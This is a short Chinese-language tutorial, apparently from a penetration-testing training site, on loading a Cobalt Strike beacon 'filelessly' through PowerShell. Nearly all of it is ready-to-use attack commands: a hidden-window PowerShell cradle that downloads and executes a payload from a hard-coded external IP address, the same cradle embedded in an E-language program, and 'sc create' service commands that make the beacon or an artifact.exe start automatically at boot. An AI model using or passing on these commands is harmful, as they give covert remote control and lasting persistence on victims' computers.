cs powershell无文件落地利用

 

目录

一、写入程序

二、cs powershell添加重启上线

三、应用程序添加重启上线

---

web安全学习了解： web渗透测试   
官网： 宣紫科技   

一、写入程序

cs powershell：

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://39.108.128.1:801/a'))"

以易语言为例：

运行 (“powershell.exe -nop -w hidden -c ” ＋ #引号 ＋ “IEX ((new-object net.webclient).downloadstring('http://39.108.128.1:1231/a'))” ＋ #引号, 假, #隐藏窗口)

二、cs powershell添加重启上线

sc create "name" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://39.108.128.1:801/a'))\""

三、应用程序添加重启上线

sc create "server power" binpath= "C:\Users\Administrator\Desktop\artifact.exe"
sc description "server power" "description" 设置服务的描述字符串
sc config "server power" start= auto 设置这个服务为自动启动
net start "server power" 启动服务